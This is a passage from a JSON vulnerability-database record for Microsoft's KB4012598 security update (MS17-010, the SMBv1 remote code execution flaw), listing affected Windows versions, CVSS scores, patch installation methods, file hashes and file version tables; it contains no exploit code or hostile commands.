"bebec93f-1b5a-fa13-e8dd-551821a6d3f9", "28a9ef75-2920-9f59-4d6c-4e6d6c99cf4c", "6f18bf60-d0f1-8298-413b-89f6e8170528", "670009af-2bc1-fa29-d4a5-99c02e923013", "c5c603fd-204f-4b8a-f0fb-cc95767cb3a7", "32719e08-ef7b-a697-0697-ec02d753dbb5", "e2b2a040-324c-43bf-447c-75aab15e2570", "d21af3d6-5cde-c325-4483-c1810c7a5bdd", "c2628421-ad67-7b37-cbb2-c1b1f4d4ffab", "1b3bc777-c681-e378-d422-eb618baa26f9", "dcf6c6d5-a2d1-b94e-220d-99ddd23d6cbb", "333f3bd9-9578-fda0-5919-4b8fa39524c3", "b5011041-7904-59f1-97ca-53b1da5812fb", "f74948d2-6a6e-d7ce-8733-c201e2d36a2e", "8540b382-5304-d506-ece2-a936dd11d66e", "f62ed778-6986-d76e-c007-40a28315ffbf", "86630540-cb68-b324-567b-e197838cd28b", "928d79ba-72eb-762f-39be-122173e95922", "12db0355-c78b-b1b8-0c13-671906e0652d", "fc8a5f33-cbfe-2a72-73ca-e36deb8fcd9e", "c6dbcbed-7ece-befe-c766-c638f2a7b21e", "fd3a2888-0af1-3691-5303-bc85b4302e62", "c6cab6e3-6598-6a1f-fbb2-f66d3740139d", "417fd093-b60f-5bcc-5ffe-121d73da4b0c", "9d95d170-7d1a-675a-ebb1-ab4cd0b095f1", "9dcd1ae8-74ee-a4f0-82ad-4736ad0727f7", "adc0290c-cf74-ece3-6c50-40b4b8ac2454", "9b513fa9-12cb-5183-ab1b-0d5c70317be8", "ceefced2-0d6f-a4bd-50d6-875c871b8250", "9087adda-9d1d-0ba1-1b0b-ad434f940308", "96bdd47e-5cb0-fbd3-9808-6c4bead5f000", "4af945c2-8a39-6b82-777b-5067ce2c9216", "6f3de84c-ccb0-9b4f-f885-a0071dfc8aa1", "2994eca6-696c-b523-20de-40b02211bb3b", "417baa75-0c45-df0a-8e65-960580d94f42", "0d05b8b1-ed59-2bf9-9d27-07c0db1c697f", "dc52833c-eac7-25b7-b942-b2dfcfbace09", "2b2eeb95-d89c-6614-0db5-88f09133ede6", "6a967721-27d9-bd5f-9029-99ca5f0436dd"], "supportAreaPathNodes": [{"id": "c2628421-ad67-7b37-cbb2-c1b1f4d4ffab", "name": "Windows Server 2008 Datacenter", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "bebec93f-1b5a-fa13-e8dd-551821a6d3f9", "name": "Windows 8.1 Pro", "parent": "b905caa1-d413-c90c-bed3-20aead901092", "tree": [], "type": "productversion"}, {"id": "dc52833c-eac7-25b7-b942-b2dfcfbace09", "name": "Windows Server 2012 R2 Essentials", "parent": "3ec8448d-ebc8-8fc0-e0b7-9e8ef6c79918", "tree": [], "type": "productversion"}, {"id": "8540b382-5304-d506-ece2-a936dd11d66e", "name": "Windows 10, version 1511, all editions", "parent": "6ae59d69-36fc-8e4d-23dd-631d98bf74a9", "tree": [], "type": "productversion"}, {"id": "fd3a2888-0af1-3691-5303-bc85b4302e62", "name": "Windows Vista Home Premium", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "96bdd47e-5cb0-fbd3-9808-6c4bead5f000", "name": "Windows Server 2008 R2 Datacenter", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "0d05b8b1-ed59-2bf9-9d27-07c0db1c697f", "name": "Windows Vista Service Pack 2", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "12db0355-c78b-b1b8-0c13-671906e0652d", "name": "Windows Server 2016 Essentials", "parent": "c3a1be8a-50db-47b7-d5eb-259debc3abcc", "tree": [], "type": "productversion"}, {"id": "f62ed778-6986-d76e-c007-40a28315ffbf", "name": "Windows Server 2008 Enterprise", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "6a967721-27d9-bd5f-9029-99ca5f0436dd", "name": "Windows Server 2012 R2 Foundation", "parent": "3ec8448d-ebc8-8fc0-e0b7-9e8ef6c79918", "tree": [], "type": "productversion"}, {"id": "2b2eeb95-d89c-6614-0db5-88f09133ede6", "name": "Windows Server 2008 Foundation", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "da37feb8-f7a1-3a1e-aad9-261b598ba5b9", "name": "Windows 7 Home Basic", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "6f3de84c-ccb0-9b4f-f885-a0071dfc8aa1", "name": "Windows 7 Ultimate", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "e2b2a040-324c-43bf-447c-75aab15e2570", "name": "Windows Server 2012 Foundation", "parent": "0cfbf2af-24ea-3e18-17e6-02df7331b571", "tree": [], "type": "productversion"}, {"id": "c5c603fd-204f-4b8a-f0fb-cc95767cb3a7", "name": "Windows Server 2008 for Itanium-Based Systems", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "28a9ef75-2920-9f59-4d6c-4e6d6c99cf4c", "name": "Windows Server 2012 R2 Datacenter", "parent": "3ec8448d-ebc8-8fc0-e0b7-9e8ef6c79918", "tree": [], "type": "productversion"}, {"id": "1b3bc777-c681-e378-d422-eb618baa26f9", "name": "Windows Server 2012 Essentials", "parent": "0cfbf2af-24ea-3e18-17e6-02df7331b571", "tree": [], "type": "productversion"}, {"id": "670009af-2bc1-fa29-d4a5-99c02e923013", "name": "Windows Server 2008 R2 Standard", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "289fe55d-04e8-fd33-f9f3-f7ad74c153bf", "name": "Windows Server 2012 R2 Standard", "parent": "3ec8448d-ebc8-8fc0-e0b7-9e8ef6c79918", "tree": [], "type": "productversion"}, {"id": "b2012b15-7770-3165-b934-5b004ee86f67", "name": "Windows 8.1", "parent": "b905caa1-d413-c90c-bed3-20aead901092", "tree": [], "type": "productversion"}, {"id": "e51103b3-9b99-948e-95ff-fd63b48f329b", "name": "Windows 10, version 1607, all editions", "parent": "6ae59d69-36fc-8e4d-23dd-631d98bf74a9", "tree": [], "type": "productversion"}, {"id": "9b513fa9-12cb-5183-ab1b-0d5c70317be8", "name": "Windows Server 2016 Standard", "parent": "c3a1be8a-50db-47b7-d5eb-259debc3abcc", "tree": [], "type": "productversion"}, {"id": "ceefced2-0d6f-a4bd-50d6-875c871b8250", "name": "Windows Server 2012 Datacenter", "parent": "0cfbf2af-24ea-3e18-17e6-02df7331b571", "tree": [], "type": "productversion"}, {"id": "4af945c2-8a39-6b82-777b-5067ce2c9216", "name": "Windows Server 2012 Standard", "parent": "0cfbf2af-24ea-3e18-17e6-02df7331b571", "tree": [], "type": "productversion"}, {"id": "dcf6c6d5-a2d1-b94e-220d-99ddd23d6cbb", "name": "Windows 7 Enterprise", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "86630540-cb68-b324-567b-e197838cd28b", "name": "Windows RT 8.1", "parent": "13d0da43-f4d6-9f8e-d090-ed3881084c6e", "tree": [], "type": "productversion"}, {"id": "371fbe0b-cb79-c748-a47a-4dc327bf6944", "name": "Windows Vista Business", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "9d95d170-7d1a-675a-ebb1-ab4cd0b095f1", "name": "Windows Vista Home Basic", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "928d79ba-72eb-762f-39be-122173e95922", "name": "Windows Vista Starter", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "b5011041-7904-59f1-97ca-53b1da5812fb", "name": "Windows 7 Starter", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "9dcd1ae8-74ee-a4f0-82ad-4736ad0727f7", "name": "Windows Server 2008 Service Pack 2", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "c6cab6e3-6598-6a1f-fbb2-f66d3740139d", "name": "Windows 10", "parent": "6ae59d69-36fc-8e4d-23dd-631d98bf74a9", "tree": [], "type": "productversion"}, {"id": "2994eca6-696c-b523-20de-40b02211bb3b", "name": "Windows Server 2008 R2 Enterprise", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "6f18bf60-d0f1-8298-413b-89f6e8170528", "name": "Windows 7 Professional", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "333f3bd9-9578-fda0-5919-4b8fa39524c3", "name": "Windows Server 2008 Standard", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "2bcc8288-b2b0-9ff3-3992-cc01f9c21619", "name": "Windows Vista Enterprise", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "32719e08-ef7b-a697-0697-ec02d753dbb5", "name": "Windows Server 2008 R2 Web Edition", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "d21af3d6-5cde-c325-4483-c1810c7a5bdd", "name": "Windows Server 2008 R2 Foundation", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "417baa75-0c45-df0a-8e65-960580d94f42", "name": "Windows Server 2008 R2 Service Pack 1", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "c6dbcbed-7ece-befe-c766-c638f2a7b21e", "name": "Windows 7 Home Premium", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "417fd093-b60f-5bcc-5ffe-121d73da4b0c", "name": "Windows Vista Ultimate", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "fc8a5f33-cbfe-2a72-73ca-e36deb8fcd9e", "name": "Windows 8.1 Enterprise", "parent": "b905caa1-d413-c90c-bed3-20aead901092", "tree": [], "type": "productversion"}, {"id": "adc0290c-cf74-ece3-6c50-40b4b8ac2454", "name": "Windows Server 2008 Web Edition", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "9087adda-9d1d-0ba1-1b0b-ad434f940308", "name": "Windows 7 Service Pack 1", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "f74948d2-6a6e-d7ce-8733-c201e2d36a2e", "name": "Windows Server 2016 Datacenter", "parent": "c3a1be8a-50db-47b7-d5eb-259debc3abcc", "tree": [], "type": "productversion"}], "primarySupportAreaPath": [{"id": "c3a1be8a-50db-47b7-d5eb-259debc3abcc", "name": "Windows Server 2016", "parent": "7ff57180-2b05-67aa-2c03-ab46c7848b89", "tree": [], "type": "productname"}, {"id": "7ff57180-2b05-67aa-2c03-ab46c7848b89", "name": "Windows Servers", "tree": [], "type": "productfamily"}, {"id": "f74948d2-6a6e-d7ce-8733-c201e2d36a2e", "name": "Windows Server 2016 Datacenter", "parent": "c3a1be8a-50db-47b7-d5eb-259debc3abcc", "tree": [], "type": "productversion"}], "_object_type": "robots.models.microsoftKB.MicrosoftKBBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.microsoftKB.MicrosoftKBBulletin"], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "5f532a3fc4f1ea403f37070f59a7a53a"}, {"key": "cvelist", "hash": "142f691ada068c40ae71fdd0eac8502e"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "f96bf1d801552d52091ad0866ebdf356"}, {"key": "href", "hash": "ba4b35c5b6cbeae7458c44303b393638"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "3a3a69118b5452ccfeb3abf80705c731"}, {"key": "published", "hash": "b8d2e9770277e4a8198efeee8a25dfbc"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "140864078aeca1c7c35b4beb33c53c34"}, {"key": "title", "hash": "5a498871a848d25d798ef27dcbd52a89"}, {"key": "type", "hash": "5ee5f53b9d07be79a50e7281a2bfec4e"}], "scheme": null}, {"id": "KB4012598", "vendorId": null, "hash": "117c5430f03c6e810022aeea1f9a9229", "type": "mskb", "bulletinFamily": "microsoft", "title": "MS17-010: Description of the security update for Windows SMB Server: March 14, 2017", "description": "None\n\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Windows. The most\nsevere of the vulnerabilities could allow remote code execution if an attacker\nsends specially crafted messages to a Microsoft Server Message Block 1.0\n(SMBv1) server. \n \nTo learn more about the vulnerability, see [Microsoft Security Bulletin\nMS17-010](https://technet.microsoft.com/library/security/ms17-010).\n\n## More Information\n\nImportant \n \n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](https://technet.microsoft.com/en-us/library/hh825699).\n\n## How to obtain and install the update\n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic\nupdating, this update will be downloaded and installed automatically. For more\ninformation about how to turn on automatic updating, see [Get security updates\nautomatically](https://www.microsoft.com/en-us/safety/pc-\nsecurity/updates.aspx). \n \n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update\nCatalog](http://catalog.update.microsoft.com/v7/site/search.aspx?q=4012598)\nwebsite. \n\n## More Information\n\n##\n\n __\n\nHow to obtain help and support for this security update\n\nHelp for installing updates: [Windows Update:\nFAQ](http://support.microsoft.com/ph/6527) \n \nSecurity solutions for IT professionals: [TechNet Security Support and\nTroubleshooting](https://technet.microsoft.com/security/bb980617.aspx) \n \nHelp for protecting your Windows-based computer from viruses and malware:\n[Microsoft Secure](http://support.microsoft.com/contactus/cu_sc_virsec_master) \n \nLocal support according to your country: [International\nSupport](https://www.microsoft.com/en-us/locale.aspx) \n\nFile Information\n\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://support.microsoft.com/en-us/help/4012598", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-11-12T13:08:44", "history": [{"bulletin": {"id": "KB4012598", "vendorId": null, "hash": "92a1fae50fb87d768e094469afe2ce72672359fe9fe4427d0066d05a0596a1bc", "type": "mskb", "bulletinFamily": "microsoft", "title": "MS17-010: Description of the security update for Windows SMB Server: March 14, 2017", "description": "<html><body><p>Resolves a vulnerability in Windows that could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.</p><h2>Summary</h2><div class=\"kb-summary-section section\">This security update resolves vulnerabilities in Microsoft Windows. The most severe of the vulnerabilities could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.<br/><br/>To learn more about the vulnerability, see <a href=\"https://technet.microsoft.com/library/security/MS17-010\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS17-010</a>. </div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><span class=\"text-base\">Important <br/><br/></span><ul class=\"sbody-free_list\"> <li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>. </li></ul></div><h2>How to obtain and install the update</h2><div class=\"kb-resolution-section section\"><h3 class=\"sbody-h3\">Method 1: Windows Update</h3><div class=\"kb-collapsible kb-collapsible-expanded\">This update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see <a href=\"https://www.microsoft.com/en-us/safety/pc-security/updates.aspx\" id=\"kb-link-13\" target=\"_self\">Get security updates automatically</a>. <br/><br/></div><h3 class=\"sbody-h3\">Method 2: Microsoft Update Catalog</h3><div class=\"kb-collapsible kb-collapsible-expanded\">To get the stand-alone package for this update, go to the <a href=\" http://catalog.update.microsoft.com/v7/site/search.aspx?q=4012598\" id=\"kb-link-14\" target=\"_self\">Microsoft Update Catalog</a> website. <br/></div></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span></span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-15\" target=\"_self\">Windows Update: FAQ</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-16\" target=\"_self\">TechNet Security Support and Troubleshooting</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-17\" target=\"_self\">Microsoft Secure</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-18\" target=\"_self\">International Support</a></div><br/></div></div></div><a class=\"bookmark\" id=\"fileinfo\"></a></div><h2>File Information</h2><formatting type=\"H3\">File hash information</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><table><tr><th>File name</th><th>SHA1 hash</th><th>SHA256 hash</th></tr><tr><td>Windows6.0-KB4012598-ia64.msu</td><td>83A6F5A70588B27623B11C42F1C8124A25D489DE</td><td>29B40D7E75186A9CCC9F2F309417E374846F35F41B4D1DE6DBE85F439DC1837F</td></tr><tr><td>Windows6.0-KB4012598-x64.msu</td><td>6A186BA2B2B98B2144B50F88BAF33A5FA53B5D76</td><td>A91A0AF728225FF2A630B9ABA4E639473AA8ABE7CAA23BE10AE48A7887BDE9C8</td></tr><tr><td>Windows6.0-KB4012598-x86.msu</td><td>13E9B3D77BA5599764C296075A796C16A85C745C</td><td>FC7F28A72C117C2A8ECE5916532048C8BF3379C86386348C24319EAC2C6B23C8</td></tr></table><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink><br/><br/><formatting type=\"H3\">File information</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><boilerplate boilerplatename=\"QFEFileAttributes\" version=\"7\">The English (United States) version of this software update installs files that have the attributes that are listed in the following tables.</boilerplate><formatting type=\"H4\">Windows Vista and Windows Server 2008 file information</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><formatting type=\"B\">Notes: </formatting>The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.<br/><br/><formatting type=\"H5\">For all supported ia64-based versions</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><table class=\"table\"><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>230,912</td><td>03-Aug-2016</td><td>15:36</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,848</td><td>03-Aug-2016</td><td>17:01</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>144,384</td><td>03-Aug-2016</td><td>16:49</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>137,216</td><td>03-Aug-2016</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>99,840</td><td>03-Aug-2016</td><td>17:00</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>101,376</td><td>03-Aug-2016</td><td>16:55</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:11</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>230,912</td><td>11-Feb-2017</td><td>16:21</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,848</td><td>11-Feb-2017</td><td>17:20</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>144,384</td><td>11-Feb-2017</td><td>17:15</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>137,216</td><td>11-Feb-2017</td><td>17:14</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>99,840</td><td>11-Feb-2017</td><td>17:26</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>101,376</td><td>11-Feb-2017</td><td>17:23</td><td>Not applicable</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.19673</td><td>17,920</td><td>03-Aug-2016</td><td>15:35</td><td>IA-64</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.24067</td><td>17,920</td><td>11-Feb-2017</td><td>16:16</td><td>IA-64</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.19673</td><td>297,984</td><td>03-Aug-2016</td><td>14:20</td><td>IA-64</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.24067</td><td>297,984</td><td>11-Feb-2017</td><td>15:22</td><td>IA-64</td></tr><tr><td>Srv.sys</td><td>6.0.6002.19743</td><td>967,168</td><td>11-Feb-2017</td><td>15:31</td><td>IA-64</td></tr><tr><td>Srv.sys</td><td>6.0.6002.24067</td><td>969,216</td><td>11-Feb-2017</td><td>15:22</td><td>IA-64</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.19673</td><td>468,480</td><td>03-Aug-2016</td><td>14:20</td><td>IA-64</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.24067</td><td>474,624</td><td>11-Feb-2017</td><td>15:22</td><td>IA-64</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:20</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>15:44</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>155,648</td><td>03-Aug-2016</td><td>16:38</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>147,456</td><td>03-Aug-2016</td><td>16:31</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:39</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:27</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>17:09</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>155,648</td><td>11-Feb-2017</td><td>16:53</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>147,456</td><td>11-Feb-2017</td><td>17:00</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:15</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.19673</td><td>17,920</td><td>03-Aug-2016</td><td>15:45</td><td>x86</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.24067</td><td>17,920</td><td>11-Feb-2017</td><td>16:17</td><td>x86</td></tr></table><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink><br/><br/><formatting type=\"H5\">For all supported x64-based versions</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><table class=\"table\"><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>233,984</td><td>03-Aug-2016</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>239,104</td><td>03-Aug-2016</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>289,792</td><td>03-Aug-2016</td><td>17:03</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>230,912</td><td>03-Aug-2016</td><td>16:23</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>263,168</td><td>03-Aug-2016</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>229,376</td><td>03-Aug-2016</td><td>17:05</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,848</td><td>03-Aug-2016</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>253,440</td><td>03-Aug-2016</td><td>17:10</td><td>Not 